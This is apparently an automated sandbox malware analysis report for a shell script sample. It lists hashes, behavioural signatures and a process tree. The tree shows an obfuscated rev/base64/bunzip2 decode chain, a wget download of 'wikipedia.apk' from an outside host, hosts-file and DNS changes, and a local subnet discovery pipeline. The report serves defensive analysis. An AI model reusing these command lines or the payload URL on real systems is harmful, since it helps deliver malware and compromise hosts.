Analysis
max time kernel: 0s
max time network: 121s
platform: linux_mips
resource: debian9-mipsbe-en-20211208
resource tags: arch:mips image:debian9-mipsbe-en-20211208 kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system
submitted: 15/03/2023, 11:04
Static task: static1
Behavioral task: behavioral1
  Sample: app_mod copy.sh_
  Resource: ubuntu1804-amd64-en-20211208
Behavioral task: behavioral2
  Sample: app_mod copy.sh_
  Resource: debian9-armhf-20221111-en
Behavioral task: behavioral3
  Sample: app_mod copy.sh_
  Resource: debian9-mipsbe-en-20211208
Behavioral task: behavioral4
  Sample: app_mod copy.sh_
  Resource: debian9-mipsel-20221111-en
General
Target: app_mod copy.sh_
Size: 51KB
MD5: 5a8c1fac337fb034f3a7456b0c416758
SHA1: d883644c417a5f1543b88f2ac407ee84e1425420
SHA256: 902a66ff2a651275836d70b621a02225c3cdefc98dc4d28faee3ba772f65da2b
SHA512: 8adba312ef13f5628bffbb6f399f65d50f7479874fda4c191bc10e51fd48a49d5b8d247bc2cfbc99d6fe9a76fe5500976571d6ac4a150efae144ece3f5d1248a
SSDEEP: 1536:DxEyGznImjPZzlz1pxvp4eWbOvWM2I306DMmAgu:DxEyGznI4xl4jOvzhDMz
Malware Config
Signatures

Modifies hosts file (1 IoCs)
Adds to hosts file used for mapping hosts to IP addresses.
description | ioc | Process
/etc/hosts | /etc/hosts | wget

Writes DNS configuration (1 TTPs, 1 IoCs)
Writes data to DNS resolver config file.
description | ioc | Process
/etc/resolv.conf | /etc/resolv.conf | wget

Reads runtime system information (2 IoCs)
Reads data from /proc virtual filesystem.
description | ioc
/proc/321 | /proc/321
/proc/353 | /proc/353

Writes file to tmp directory (6 IoCs)
Malware often drops required files in the /tmp directory.
description | ioc | Process
/tmp/sh-thd.Hon5Ey | /tmp/sh-thd.Hon5Ey | Process not Found
/tmp/sh-thd.bUq9CZ | /tmp/sh-thd.bUq9CZ | Process not Found
/tmp/sh-thd.VEhENb | /tmp/sh-thd.VEhENb | Process not Found
/tmp/app_mod copy.sh_ | /tmp/app_mod copy.sh_ | app_mod copy.sh_
/tmp/sh-thd.OcHwk3 | /tmp/sh-thd.OcHwk3 | app_mod copy.sh_
/tmp/sh-thd.CAPpFt | /tmp/sh-thd.CAPpFt | Process not Found
Processes
Path | Command line | Level | PID
/tmp/app_mod copy.sh_ | "/tmp/app_mod copy.sh_" | 1⤵ | PID:321
  - Writes file to tmp directory
/usr/bin/rev | rev | 1⤵ | PID:328
/bin/bunzip2 | bunzip2 -c | 1⤵ | PID:333
/usr/bin/base64 | base64 -d | 1⤵ | PID:332
/bin/cat | cat | 1⤵ | PID:337
./! | "./!" | 1⤵ | PID:342
/bin/bash | bash -c ";" | 1⤵ | PID:344
/usr/bin/rev | rev | 1⤵ | PID:349
/bin/bash | bash | 1⤵ | PID:346
/bin/bash | /bin/bash | 2⤵ | PID:350
/bin/bash | bash | 3⤵ | PID:353
/usr/bin/base64 | base64 -d | 1⤵ | PID:356
/bin/bunzip2 | bunzip2 -c | 1⤵ | PID:357
/bin/cat | cat | 1⤵ | PID:361
./_ | ./_ | 1⤵ | PID:366
/bin/bash | bash -c ";" | 1⤵ | PID:368
/usr/bin/wget | wget -o wikipedia.apk https://int3.sk/wikipedia.apk | 1⤵ | PID:370
  - Modifies hosts file
  - Writes DNS configuration
/sbin/ip | ip addr | 1⤵ | PID:372
/bin/grep | grep 192 | 1⤵ | PID:373
/usr/bin/awk | awk "{print \$2}" | 1⤵ | PID:374
/usr/bin/cut | cut -d. -f 1-3 | 1⤵ | PID:375